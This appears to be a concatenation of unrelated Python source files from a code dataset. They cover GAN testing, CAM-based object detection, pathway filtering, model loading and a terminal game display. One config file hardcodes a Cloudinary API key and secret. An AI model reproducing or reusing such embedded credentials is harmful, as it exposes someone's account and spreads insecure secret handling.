x = self.dropout2(x)
#x = F.dropout(x, pDropout)
output = torch.tanh(self.fc3_bn(self.fc3(x)))
#output = torch.sigmoid(self.fc3_bn(self.fc3(x))) # deactivate data rescaling in train and loop
return output
# define the class for the Discriminator
class Dis(nn.Module):
def __init__(self):
super(Dis, self).__init__()
self.flatten = nn.Flatten()
self.fc1_1 = nn.Linear(784, pic_knots)
#self.fc1_1_bn = nn.BatchNorm1d(pic_knots)
self.fc1_2 = nn.Linear(10, label_knots)
#self.fc1_2_bn = nn.BatchNorm1d(label_knots)
self.dropout1 = nn.Dropout(p=pDropout)
self.fc2 = nn.Linear(512, 512)
#self.fc2_bn = nn.BatchNorm1d(512)
self.dropout2 = nn.Dropout(p=pDropout)
self.fc3 = nn.Linear(512, 1)
def forward(self, input, label):
input = self.flatten(input)
x1 = F.leaky_relu(self.fc1_1(input), negative_slope=scale)
x2 = F.leaky_relu(self.fc1_2(label), negative_slope=scale)
x = torch.cat([x1, x2], 1)
x = self.dropout1(x)
#x = F.dropout(x, pDropout)
x = F.leaky_relu(self.fc2(x), negative_slope=scale)
x = self.dropout2(x)
#x = F.dropout(x, pDropout)
output = torch.sigmoid(self.fc3(x))
return output
#load a cGAN-model:
#MNIST
#trained_cGAN = "trained models/cGAN/cGAN_model6.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model7.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model8.pth"
trained_cGAN = "trained models/cGAN/cGAN_model9.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model10.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model11.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model12.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model13.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model14.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model15.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model16.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model17.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model18.pth"
#FashionMNIST
#trained_cGAN = "trained models/cGAN/cGAN_model19.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model20.pth"
(G, _) = torch.load(trained_cGAN)
# to make sure that test set is always 10.000:
epochs = 10000//batch_size
#test it:
print("Testing...")
C.eval()
if G_in_eval == True:
G.eval()
else:
G.train()
total = 0
correct = 0
with torch.no_grad():
for k in range(epochs): # same size as test set MNIST
if uniform_input == True:
x_rand = torch.rand(batch_size, 100, dtype=torch.float) # uniform
else:
x_rand = torch.randn(batch_size, 100, dtype=torch.float) # normal
rand_label = torch.zeros(batch_size, 10, dtype=torch.float)
rand = torch.randint(low=0, high=10, size=(batch_size, 1))
for i in range(batch_size):
rand_label[i, rand[i, 0].item()] = 1
fake_images = torch.reshape(G(x_rand, rand_label), (batch_size, 1, 28, 28))
guess = C(fake_images)
classification = torch.argmax(guess.data, 1)
total += batch_size
for i in range(batch_size):
if rand[i, 0].item() == classification[i].item():
correct += 1
accuracy = correct/total * 100
print("Test Accuracy on fake images (GAN-test):", accuracy, "%")
#show 25 images with CNN-classification
plt.figure(0)
if uniform_input == True:
x_rand = torch.rand(25, 100, dtype=torch.float) # uniform
else:
x_rand = torch.randn(25, 100, dtype=torch.float) # normal
rand_label = torch.zeros(25, 10, dtype=torch.float)
rand = torch.randint(low=0, high=10, size=(25, 1))
for i in range(25):
rand_label[i, rand[i, 0].item()] = 1
fake_images = torch.reshape(G(x_rand, rand_label), (25, 1, 28, 28))
classifications = C(fake_images)
(_, numbers) = torch.max(classifications, 1)
for i in range(25):
title = str(numbers[i].item()) + "label:" + str(rand[i, 0].item())
fake_image = torch.reshape(fake_images[i, :, :, :], (28, 28))
plt.subplot(5, 5, i + 1)
plt.axis('off') # deletes axis from plots
plt.gca().set_title(title)
plt.imshow(fake_image.detach(), cmap='gray') # gray_r for reversed grayscale
plt.show()
# show 100 images, 10 of each class in one row
plt.figure("Overview")
if uniform_input == True:
x_rand = torch.rand(100, 100, dtype=torch.float) # uniform
else:
x_rand = torch.randn(100, 100, dtype=torch.float) # normal
rand_label = torch.zeros(100, 10, dtype=torch.float)
for i in range(100):
rand_label[i, i//10] = 1
fake_images = G(x_rand, rand_label)
fake_images = torch.reshape(fake_images, (100, 1, 28, 28))
classification = C(fake_images)
(_, number) = torch.max(classification, 1)
for i in range(100):
fake_image = torch.reshape(fake_images[i, :, :, :], (28, 28))
plt.subplot(10, 10, i + 1)
plt.axis('off')
title = str(number[i].item()) + "label:" + str(i//10)
#plt.gca().set_title(title) # add classification and label to each picture
plt.imshow(fake_image.detach(), cmap='gray') # gray_r for reversed grayscale
plt.show()
|
986,982 | 46ad8e2793b7f8e57eb839ad0d87f7123f2d6b59 | #!/usr/bin/env python
# coding: utf-8
# In[2]:
from __future__ import print_function, division
import matplotlib.pyplot as plt
import random
import numpy as np
import cv2
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
import os
import urllib.request as urllib2
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
import torchvision
from torchvision import datasets, models, transforms
from torchvision.datasets import ImageFolder
import time
import copy
import sys
# In[23]:
classes = ('aeroplane','bicycle','diningtable',
'dog','horse','motorbike','person','pottedplant','sheep','sofa','train','tvmonitor',
'bird','boat','bottle','bus','car','cat','chair','cow')
# In[ ]:
data_transforms = {
'test': transforms.Compose([
transforms.Resize((224,224)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
}
# In[4]:
class SAVE_IMAGE:
def __init__(self, ncols = 0, nrows = 0, figTitle=""):
if ncols == 0 or nrows == 0:
raise ValueError("ncols and nrows must be initialize")
dpi = 80
height, width, depth = CV2_IMG.shape
figsize = width / float(dpi) * ncols , height / float(dpi) * nrows
self.fig, self.ax = plt.subplots(ncols = ncols, nrows = nrows, figsize=figsize)
self.ncols = ncols
self.nrows = nrows
if figTitle is not "":
self.fig.suptitle(figTitle, fontsize=20)
self.ccols = 0
self.crows = 0
def addImage(self, img, title = ""):
if self.nrows == 1:
if self.ncols == 1:
self.ax.imshow(img)
self.ax.set_title(title, fontsize=15)
else:
self.ax[self.ccols].imshow(img)
self.ax[self.ccols].set_title(title, fontsize=15)
else:
self.ax[self.crows][self.ccols].imshow(img)
self.ax[self.crows][self.ccols].set_title(title, fontsize=15)
if self.ccols+1 == self.ncols:
self.crows = self.crows + 1
self.ccols = 0
else:
self.ccols = self.ccols + 1
def showImage(self):
plt.show()
def saveImage(self, save_path, save_title):
plt.savefig(save_path+save_title+'.png', bbox_inches='tight')
# In[ ]:
# In[5]:
def GenerateRandomColor(num_of_class):
color = []
while len(color) < num_of_class:
r = random.randint(0,255)
g = random.randint(0,255)
b = random.randint(0,255)
rgb = [r,g,b]
color.append(rgb)
return color
# In[6]:
def CheckDirExists(PATH, DIR):
if not os.path.exists(PATH+DIR):
os.makedirs(PATH+DIR)
# In[7]:
def SaveOriginalImage(img):
save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle="base image")
save_image.addImage(img)
save_image.saveImage(RESULT_PATH+RESULT_DIR, "base_image")
# In[8]:
def GetHeatmap(img_list, height, width, title = "", figSet = False, fig = [0, 0]):
_title = "_color_heatmap"
heatmaps = []
if figSet:
save_image = SAVE_IMAGE(nrows = fig[0], ncols = fig[1], figTitle=title+_title)
else:
save_image = SAVE_IMAGE(nrows = 1, ncols = len(img_list), figTitle=title+_title)
for index, img in enumerate(img_list):
heatmap = cv2.applyColorMap(cv2.resize(img, (width, height)), cv2.COLORMAP_JET)
heatmaps.append(heatmap)
tmp_img = heatmap*0.6 + CV2_IMG*0.4
save_image.addImage(cv2.cvtColor(np.float32(tmp_img).astype('uint8'), cv2.COLOR_BGR2RGB))
save_image.saveImage(RESULT_PATH+RESULT_DIR, title+_title)
return heatmaps
# In[9]:
# orig_img에서 (R, G, B) 세 가지 채널의 정보 중 특정 채널의 정보만 남겨서 넘김
def GetChannelImage(orig_img, channel):
channel = channel.upper()
channel_img = orig_img.copy()
if channel == 'R':
channel_img[:, :, 0] = 0
channel_img[:, :, 1] = 0
elif channel == 'G':
channel_img[:, :, 0] = 0
channel_img[:, :, 2] = 0
elif channel == 'B':
channel_img[:, :, 1] = 0
channel_img[:, :, 2] = 0
return channel_img
# In[10]:
# color image를 gray scale로 바꾼 후, threshold를 적용함
# threshold는 고정 값으로 mean(min, max)
def GetGrayscaleImageWithThreshold(orig_img):
gray_img = cv2.cvtColor(orig_img, cv2.COLOR_BGR2GRAY)
min_val = np.min(gray_img)
max_val = np.max(gray_img)
threshold = (min_val + max_val) / 2
ret, gray_img = cv2.threshold(gray_img, threshold, 1, cv2.THRESH_BINARY)
return gray_img
# In[11]:
# grayscale_mask 에서 1인 부분만 orig_img를 보여줌. 0인 부분은 검정색으로 보임
def GetMaskedImage(orig_img, gray_map):
mask = cv2.cvtColor(gray_map, cv2.COLOR_GRAY2BGR)
maskedRegion = np.where(mask == 1, orig_img, 0)
return cv2.cvtColor(maskedRegion, cv2.COLOR_BGR2RGB)
# In[12]:
def GetGrayscaleHeatmap(heatmaps, title = "", figSet = False, fig = [0, 0]):
_title = "_grayscale_heatmap"
result = []
for index, heatmap in enumerate(heatmaps):
# heatmap에서 R channel만 뽑아냄
tmp = GetChannelImage(heatmap, 'r')
# grayscale로 변환 후 threshold 적용
result.append(GetGrayscaleImageWithThreshold(tmp))
if figSet:
save_image = SAVE_IMAGE(nrows = fig[0], ncols = fig[1], figTitle=title+_title)
else:
save_image = SAVE_IMAGE(nrows = 1, ncols = len(result), figTitle=title+_title)
for index, graymap in enumerate(result):
save_image.addImage(GetMaskedImage(CV2_IMG, graymap))
save_image.saveImage(RESULT_PATH+RESULT_DIR, title+_title)
return result
# In[13]:
def GetContours(img_binary):
contours, hierarchy = cv2.findContours(img_binary, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
return contours
# In[14]:
def GetBBox(img_binary):
bb = []
contours = GetContours(img_binary)
for cnt in contours:
x, y, w, h = cv2.boundingRect(cnt)
bb.append([x, y, w, h])
return bb
# In[15]:
def DrawBBox(bounding_box, img):
tmp_img = img.copy()
dim = np.array(bounding_box).ndim
if dim == 2:
for x, y, w, h in bounding_box:
cv2.rectangle(tmp_img, (x, y), (x + w, y + h), (0, 255, 0), 2)
elif dim == 3:
for bb in bounding_box:
for x, y, w, h in bb:
cv2.rectangle(tmp_img, (x, y), (x + w, y + h), (0, 255, 0), 2)
return cv2.cvtColor(tmp_img, cv2.COLOR_BGR2RGB)
# In[16]:
def DrawContourAndBBox(img_binary, img):
contours = GetContours(img_binary)
tmp_img = img.copy()
# draw contours - red
for cnt in contours:
cv2.drawContours(tmp_img, [cnt], 0, (0,0,255),3)
# draw bounding box - green
bb = GetBBox(img_binary)
for x, y, w, h in bb:
cv2.rectangle(tmp_img, (x, y), (x + w, y + h), (0, 255, 0), 3)
return cv2.cvtColor(tmp_img, cv2.COLOR_BGR2RGB)
# In[17]:
def CompareContourAndBBox(heatmaps, title = "", figSet = False, fig = [0, 0]):
_title = "_contour"
if figSet:
save_image = SAVE_IMAGE(nrows = fig[0], ncols = fig[1], figTitle=title+_title)
else:
save_image = SAVE_IMAGE(nrows = 1, ncols = len(heatmaps), figTitle=title+_title)
for index, heatmap in enumerate(heatmaps):
save_image.addImage(DrawContourAndBBox(heatmap, CV2_IMG))
save_image.saveImage(RESULT_PATH+RESULT_DIR, title+_title)
# In[ ]:
def GetIOU(_bb1, _bb2, changeScale = False, basedOnCAM = False):
# _bb2 == cam_bb
if changeScale:
# _bb1, _bb2 = [x, y, w, h]
if len(_bb1) == 4 and len(_bb2) == 4:
bb1 = {'x1':_bb1[0], 'y1':_bb1[1], 'x2':_bb1[0]+_bb1[2], 'y2':_bb1[1]+_bb1[3]}
bb2 = {'x1':_bb2[0], 'y1':_bb2[1], 'x2':_bb2[0]+_bb2[2], 'y2':_bb2[1]+_bb2[3]}
else:
exit(0)
else:
# _bb1, _bb2 = ['x1':x1, 'x2':x2, 'y1':y1, 'y2':y2]
x1, y1, x2, y2 = _bb1
bb1 = {"x1": x1, "y1": y1, "x2": x2, "y2": y2}
x1, y1, x2, y2 = _bb2
bb2 = {"x1": x1, "y1": y1, "x2": x2, "y2": y2}
assert bb1['x1'] < bb1['x2']
assert bb1['y1'] < bb1['y2']
assert bb2['x1'] < bb2['x2']
assert bb2['y1'] < bb2['y2']
# determine the coordinates of the intersection rectangle
x_left = max(bb1['x1'], bb2['x1'])
y_top = max(bb1['y1'], bb2['y1'])
x_right = min(bb1['x2'], bb2['x2'])
y_bottom = min(bb1['y2'], bb2['y2'])
if x_right < x_left or y_bottom < y_top:
return 0.0
# The intersection of two axis-aligned bounding boxes is always an
# axis-aligned bounding box
intersection_area = (x_right - x_left) * (y_bottom - y_top)
# compute the area of both AABBs
bb1_area = (bb1['x2'] - bb1['x1']) * (bb1['y2'] - bb1['y1'])
bb2_area = (bb2['x2'] - bb2['x1']) * (bb2['y2'] - bb2['y1'])
# compute the intersection over union by taking the intersection
# area and dividing it by the sum of prediction + ground-truth
if basedOnCAM:
# cam_bb 기준 iou
iou = intersection_area / float(bb2_area)
else:
iou = intersection_area / float(bb1_area + bb2_area - intersection_area)
assert iou >= 0.0
assert iou <= 1.0
return iou
# In[ ]:
def isExist(bounding_box, bb):
for _bb in bounding_box:
if np.array_equal(_bb, bb):
return True
return False
# In[ ]:
def GetCandidateBBox(FM_BB, CAM_BB):
# FM_BB dim = 2
# CAM_BB dim = 2
bounding_box = []
for fm_bb in FM_BB:
for cam_bb in CAM_BB:
iou = GetIOU(fm_bb, cam_bb, changeScale = True, basedOnCAM=True)
if iou > 0.7:
if not isExist(bounding_box, fm_bb):
bounding_box.append(fm_bb)
return bounding_box
# In[ ]:
def NMS(bounding_box, probs):
bbox = []
for x, y, w, h in bounding_box:
bbox.append([x,y, x+w, y+h])
_opencvImg = CV2_IMG.copy()
bbox = torch.as_tensor(bbox).float()
probs = torch.as_tensor(probs)
for c in range(len(classes)):
_cnt = 0
# threshold 적용
prob = probs[:, c].clone()
m = nn.Threshold(0.2, 0)
prob = m(prob)
order = torch.argsort(prob, descending=True)
for i in range(len(order)):
bbox_max = bbox[order[i]]
for j in range(i+1, len(order)):
bbox_cur = bbox[order[j]]
if GetIOU(bbox_max, bbox_cur) > 0.5:
prob[order[j]] = 0
probs[:, c] = prob
return probs
return
# In[ ]:
def get_predict(model, img):
model.eval()
with torch.no_grad():
inputs = img.to(device)
inputs = inputs.unsqueeze(0)
outputs = model(inputs)
softmax = nn.Softmax(dim=1)
outputs = softmax(outputs)
return outputs
def DrawResultByClass(bounding_box, probs, fig = [5, 4]):
_opencvImg = CV2_IMG.copy()
save_image = SAVE_IMAGE(nrows = fig[0], ncols = fig[1], figTitle="")
for i in range(20):
row = int(i / 5)
col = i % 5
_opencvImg = CV2_IMG.copy()
draw = 0
for cnt in range(len(bounding_box)):
cls_idx = torch.argsort(probs[cnt, :], descending=True)[0]
if cls_idx == i:
if probs[cnt][cls_idx] > 0:
draw += 1
x,y,w,h = bounding_box[cnt]
_opencvImg = cv2.rectangle(_opencvImg, (x, y,), (x+w, y+h), color[cls_idx], 2)
text = '{} ({:.3f})'.format(classes[cls_idx], probs[cnt][cls_idx])
cv2.putText(_opencvImg, text, (x, y+25), cv2.FONT_HERSHEY_SIMPLEX, 1, color[cls_idx], 2)
title = classes[i] + ": "+str(draw)
save_image.addImage(cv2.cvtColor(_opencvImg, cv2.COLOR_BGR2RGB), title=title)
save_image.saveImage(RESULT_PATH+RESULT_DIR, "draw_result_by_class")
# In[ ]:
def cv2_selective_search(img, searchMethod='f'):
ss = cv2.ximgproc.segmentation.createSelectiveSearchSegmentation()
ss.setBaseImage(img)
if searchMethod == 'f':
ss.switchToSelectiveSearchFast()
elif searchMethod == 'q':
ss.switchToSelectiveSearchQuality()
regions = ss.process()
return regions
def DrawResult(bounding_box, probs):
draw = 0
_opencvImg = CV2_IMG.copy()
for cnt in range(len(bounding_box)):
cls_idx = torch.argsort(probs[cnt, :], descending=True)[0]
if probs[cnt][cls_idx] > 0:
draw += 1
x,y,w,h = bounding_box[cnt]
_opencvImg = cv2.rectangle(_opencvImg, (x, y,), (x+w, y+h), color[cls_idx], 2)
text = '{} ({:.3f})'.format(classes[cls_idx], probs[cnt][cls_idx])
cv2.putText(_opencvImg, text, (x, y+25), cv2.FONT_HERSHEY_SIMPLEX, 1, color[cls_idx], 2)
title = 'final bbox: {}'.format(draw)
save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
save_image.addImage(cv2.cvtColor(_opencvImg, cv2.COLOR_BGR2RGB), title="")
save_image.saveImage(RESULT_PATH+RESULT_DIR, "result")
return
# In[22]:
def GetBoundingBox(IMG_URL, CAM_RESULT, FEATURE_MAP, fig = [0, 0], dir_name = ""):
global RESULT_PATH, RESULT_DIR, PIL_IMG, CV2_IMG
RESULT_PATH = './Result/'
RESULT_DIR = dir_name
# check and make result dir to save result
CheckDirExists(RESULT_PATH, RESULT_DIR)
# load image
PIL_IMG = Image.open(urllib2.urlopen(IMG_URL))
CV2_IMG = cv2.cvtColor(np.array(PIL_IMG), cv2.COLOR_RGB2BGR)
height, width, depth = CV2_IMG.shape
# save base image
save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle="base image")
save_image.addImage(cv2.cvtColor(CV2_IMG, cv2.COLOR_BGR2RGB))
save_image.saveImage(RESULT_PATH+RESULT_DIR, "base_image")
# get CAM result bbox
## heatmap 얻기
CAM_heatmaps = GetHeatmap(CAM_RESULT, height, width, 'CAM')
CAM_heatmaps = GetGrayscaleHeatmap(CAM_heatmaps, 'CAM')
## contour와 bbox 비교 이미지 얻기
CompareContourAndBBox(CAM_heatmaps, 'CAM')
## bbox 얻기
CAM_BB = []
for index, heatmap in enumerate(CAM_heatmaps):
tmp_bb = GetBBox(heatmap)
for index2, bbox in enumerate(tmp_bb):
CAM_BB.append(bbox)
title = "CAM_BBOX: "+str(len(CAM_BB))
save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
save_image.addImage(DrawBBox(CAM_BB, CV2_IMG))
save_image.saveImage(RESULT_PATH+RESULT_DIR, "CAM_BBOX")
# get FeatureMap bbox
## heatmap 얻기
FM_heatmaps = GetHeatmap(FEATURE_MAP, height, width, 'FM', figSet = True, fig = fig)
FM_heatmaps = GetGrayscaleHeatmap(FM_heatmaps, 'FM', figSet = True, fig = fig)
## contour와 bbox 비교 이미지 얻기
CompareContourAndBBox(FM_heatmaps, 'FM', figSet = True, fig = fig)
## bbox 얻기
FM_BB = []
for index, heatmap in enumerate(FM_heatmaps):
tmp_bb = GetBBox(heatmap)
for index2, bbox in enumerate(tmp_bb):
FM_BB.append(bbox)
title = "FM_BBOX: "+str(len(FM_BB))
save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
save_image.addImage(DrawBBox(FM_BB, CV2_IMG))
save_image.saveImage(RESULT_PATH+RESULT_DIR, "FM_BBOX")
# get candidate bbox with CAM bbox and FeatureMap bbox
candidate_bbox = GetCandidateBBox(FM_BB, CAM_BB)
title = "candidate_bbox: "+str(len(candidate_bbox))
save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
save_image.addImage(DrawBBox(candidate_bbox, CV2_IMG))
save_image.saveImage(RESULT_PATH+RESULT_DIR, "candidate_bbox")
return candidate_bbox
def GetBoundingBox_SS(IMG_URL, CAM_RESULT, fig = [0, 0], dir_name = ""):
global RESULT_PATH, RESULT_DIR, PIL_IMG, CV2_IMG
RESULT_PATH = './Result/'
RESULT_DIR = dir_name
# check and make result dir to save result
CheckDirExists(RESULT_PATH, RESULT_DIR)
# load image
PIL_IMG = Image.open(urllib2.urlopen(IMG_URL))
CV2_IMG = cv2.cvtColor(np.array(PIL_IMG), cv2.COLOR_RGB2BGR)
height, width, depth = CV2_IMG.shape
# save base image
save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle="base image")
save_image.addImage(cv2.cvtColor(CV2_IMG, cv2.COLOR_BGR2RGB))
save_image.saveImage(RESULT_PATH+RESULT_DIR, "base_image")
# get CAM result bbox
## heatmap 얻기
CAM_heatmaps = GetHeatmap(CAM_RESULT, height, width, 'CAM')
CAM_heatmaps = GetGrayscaleHeatmap(CAM_heatmaps, 'CAM')
## contour와 bbox 비교 이미지 얻기
CompareContourAndBBox(CAM_heatmaps, 'CAM')
## bbox 얻기
CAM_BB = []
for index, heatmap in enumerate(CAM_heatmaps):
tmp_bb = GetBBox(heatmap)
for index2, bbox in enumerate(tmp_bb):
CAM_BB.append(bbox)
title = "CAM_BBOX: "+str(len(CAM_BB))
save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
save_image.addImage(DrawBBox(CAM_BB, CV2_IMG))
save_image.saveImage(RESULT_PATH+RESULT_DIR, "CAM_BBOX")
# get SS bbox
SS_BB = cv2_selective_search(CV2_IMG)
title = "SS_BBOX: "+str(len(SS_BB))
save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
save_image.addImage(DrawBBox(SS_BB, CV2_IMG))
save_image.saveImage(RESULT_PATH+RESULT_DIR, "SS_BBOX")
# get candidate bbox with CAM bbox and FeatureMap bbox
candidate_bbox = GetCandidateBBox(SS_BB, CAM_BB)
title = "candidate_bbox: "+str(len(candidate_bbox))
save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
save_image.addImage(DrawBBox(candidate_bbox, CV2_IMG))
save_image.saveImage(RESULT_PATH+RESULT_DIR, "candidate_bbox")
return candidate_bbox
def R_CNN(IMG_URL, candidate_bbox, fig = [0, 0], dir_name = ""):
global RESULT_PATH, RESULT_DIR, PIL_IMG, CV2_IMG
RESULT_PATH = './Result/'
RESULT_DIR = dir_name
# check and make result dir to save result
CheckDirExists(RESULT_PATH, RESULT_DIR)
# load image
PIL_IMG = Image.open(urllib2.urlopen(IMG_URL))
CV2_IMG = cv2.cvtColor(np.array(PIL_IMG), cv2.COLOR_RGB2BGR)
height, width, depth = CV2_IMG.shape
# R-CNN
## load model
global device, color
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
color = [[44, 195, 74], [62, 208, 80], [53, 230, 195], [20, 216, 183], [235, 220, 95], [16, 138, 103], [170, 172, 255], [17, 150, 98], [252, 125, 2], [142, 155, 193], [117, 25, 29], [235, 119, 120], [105, 211, 222], [66, 52, 154], [1, 33, 128], [72, 182, 183], [183, 35, 106], [216, 217, 0], [204, 201, 74], [39, 41, 236]]
model = models.resnet50(pretrained=True)
num_ftrs = model.fc.in_features
model.fc = nn.Linear(num_ftrs, 20)
model = model.to(device)
model.load_state_dict(torch.load('./Model/Resnet50_pretrained_True'))
model.eval()
det_probs = []
for index, (x, y, w, h) in enumerate(candidate_bbox):
area = (x, y, x + w, y + h)
timage = PIL_IMG.crop(area)
timage = data_transforms['test'](transforms.ToPILImage()(np.asarray(timage)))
prob = get_predict(model, timage)
det_probs.append(prob.tolist()[0])
det_probs = torch.as_tensor(det_probs)
final_probs = NMS(candidate_bbox, det_probs)
DrawResult(candidate_bbox, final_probs)
DrawResultByClass(candidate_bbox, final_probs) |
986,983 | 98ed44a75e81d4f7e60385c189a05b3e74a0020b | import os
import cloudinary
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + BASE_DIR + "/app.db"
cloudinary.config(
cloud_name = "skols",
api_key = "877892686494448",
api_secret = "AkUW2f04FrIMpDK9Q4KPrNzxU7w"
) |
986,984 | f4ef0a82d3709661bc2d501f38bc645bb1510e94 | #!/usr/bin/python
'''
DESCRIPTION
-----------
Removing disease related pathways from pathways which are obtained via hipathia package.
USAGE
-----
[PROJECT_PATH]/$ python scripts/pathway_layer_data/1.2-pg-remove-disease-cancer.py -sp {SPECIES} -src {SOURCE}
RETURN
------
pathway_ids_and_names.csv : csv file
Final version after removed disease related pathways
EXPORTED FILE(s) LOCATION
-------------------------
./data/processed/hsa/hipathia/pathway_ids_and_names.csv
'''
# importing default libraries
import os, argparse, sys
sys.path.append('./')
# importing scripts in scripts folder
from scripts import config as src
import pandas as pd
import numpy as np
def remove_disease_from_dataset(species, source):
# defining output folder
output_folder = src.define_folder( os.path.join(src.DIR_DATA_PROCESSED, species, source ) )
# importing raw dataset which is imported by hipathia
df_hp = pd.read_csv(os.path.join(src.DIR_DATA_RAW, species, source, 'pathway_ids_and_names.csv'))
print('RAW dataset,')
print('.head()', df_hp.head())
print('Shape,', df_hp.shape)
# FILTERING #1
# filtering raw dataset according to keyword, shared in below
keywords_ = ['disease', 'cancer', 'leukemia', 'infection', 'virus','addiction', 'anemia', 'cell carcinoma', 'diabet', 'Hepatitis']
df_hp = df_hp.loc[~df_hp['path.name'].str.contains('|'.join(keywords_))]
print('RAW dataset is filtered by "keywords" list!')
print('Shape,', df_hp.shape)
# FILTERING #2
# filtering again according to remained disease name, shared in below
additional_disease = ['Long-term depression', 'Insulin resistance', 'Amyotrophic lateral sclerosis (ALS)', 'Alcoholism', 'Shigellosis'
, 'Pertussis', 'Legionellosis', 'Leishmaniasis', 'Toxoplasmosis', 'Tuberculosis', 'Measles', 'Influenza A'
, 'Glioma', 'Melanoma']
df_hp = df_hp.loc[~df_hp['path.name'].isin(additional_disease)]
print('RAW dataset is filtered by "additional_disease" list!')
print('Shape,', df_hp.shape)
# exporting processed dataset
df_hp.to_csv(os.path.join(output_folder, 'pathway_ids_and_names.csv'), index=False)
print('FILE exported in {}'.format(os.path.join(output_folder, 'pathway_ids_and_names.csv')))
if __name__=='__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-sp', '--species', help='specify the species, the location of species in ./data/raw/{SPECIES}')
parser.add_argument('-src', '--source', help='specify the source, the location of source in ./data/raw/{SPECIES}/{SOURCE}')
parser.add_argument('-ga', '--genome_annotation', help='specify genome wide annotition package', default=None)
if len(sys.argv)==1:
parser.print_help(sys.stderr)
sys.exit(1)
args = parser.parse_args()
remove_disease_from_dataset(args.species, args.source) |
986,985 | c3f0f487fc22295608f09def929c4fda328633cb | from __future__ import unicode_literals
from django.apps import AppConfig
class Articles(AppConfig):
name = 'articles'
|
986,986 | 485ddf8c6b69ad55a1de289500696d1be60a97ef | # import seaborn as sns
# import matplotlib.pyplot as plt
# import numpy as np
# sns.set()
# f,ax=plt.subplots()
# C2= np.array([[176,27],[50,37]])
# sns.heatmap(C2,annot=True,ax=ax,fmt="d") #画热力图
#
# ax.set_title('confusion matrix') #标题
# ax.set_xlabel('predict') #x轴
# ax.set_ylabel('Postive') #y轴
# plt.show()
# plt.savefig('confusion matrix.pdf')
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import datasets,transforms
from model import HornetsClassifier
#writer就相当于一个日志,保存你要做图的所有信息。第二句就是在你的项目目录下建立一个文件夹log,存放画图用的文件。刚开始的时候是空的
from tensorboardX import SummaryWriter
writer = SummaryWriter('log') #建立一个保存数据用的东西
model = HornetsClassifier('tf_efficientnet_b4_ns', 2, pretrained=True).cuda()
model.load_state_dict(torch.load('./model/50/tf_efficientnet_b4_ns_fold_2_16.pth'))
print(model)
# dummy_input = torch.rand(16, 3, 64, 64) # 假设输入20张1*28*28的图片
# dummy_input=dummy_input.cuda()
# with SummaryWriter(comment='EfficientNet') as w:
# w.add_graph(model, input_to_model=dummy_input) |
986,987 | 36b0db163a5ff4ea69bb530297c23fc64afd61ae | def printing():
os.system('clear')
# colour part, 0 is invisible
a0 = str(a[0])
a1 = str(a[1])
a2 = str(a[2])
a3 = str(a[3])
b0 = str(b[0])
b1 = str(b[1])
b2 = str(b[2])
b3 = str(b[3])
c0 = str(c[0])
c1 = str(c[1])
c2 = str(c[2])
c3 = str(c[3])
d0 = str(d[0])
d1 = str(d[1])
d2 = str(d[2])
d3 = str(d[3])
Color1a0= "\033[08m{}\033[0m" .format(a0)
Color1a1= "\033[08m{}\033[0m" .format(a1)
Color1a2= "\033[08m{}\033[0m" .format(a2)
Color1a3= "\033[08m{}\033[0m" .format(a3)
Color1b0= "\033[08m{}\033[0m" .format(b0)
Color1b1= "\033[08m{}\033[0m" .format(b1)
Color1b2= "\033[08m{}\033[0m" .format(b2)
Color1b3= "\033[08m{}\033[0m" .format(b3)
Color1c0= "\033[08m{}\033[0m" .format(c0)
Color1c1= "\033[08m{}\033[0m" .format(c1)
Color1c2= "\033[08m{}\033[0m" .format(c2)
Color1c3= "\033[08m{}\033[0m" .format(c3)
Color1d0= "\033[08m{}\033[0m" .format(d0)
Color1d1= "\033[08m{}\033[0m" .format(d1)
Color1d2= "\033[08m{}\033[0m" .format(d2)
Color1d3= "\033[08m{}\033[0m" .format(d3)
Color2a0= "\033[92m{}\033[0m" .format(a0)
Color2a1= "\033[92m{}\033[0m" .format(a1)
Color2a2= "\033[92m{}\033[0m" .format(a2)
Color2a3= "\033[92m{}\033[0m" .format(a3)
Color2b0= "\033[92m{}\033[0m" .format(b0)
Color2b1= "\033[92m{}\033[0m" .format(b1)
Color2b2= "\033[92m{}\033[0m" .format(b2)
Color2b3= "\033[92m{}\033[0m" .format(b3)
Color2c0= "\033[92m{}\033[0m" .format(c0)
Color2c1= "\033[92m{}\033[0m" .format(c1)
Color2c2= "\033[92m{}\033[0m" .format(c2)
Color2c3= "\033[92m{}\033[0m" .format(c3)
Color2d0= "\033[92m{}\033[0m" .format(d0)
Color2d1= "\033[92m{}\033[0m" .format(d1)
Color2d2= "\033[92m{}\033[0m" .format(d2)
Color2d3= "\033[92m{}\033[0m" .format(d3)
if a[0] == 0:
a0 = Color1a0
else:
a0 = Color2a0
if a[1] == 0:
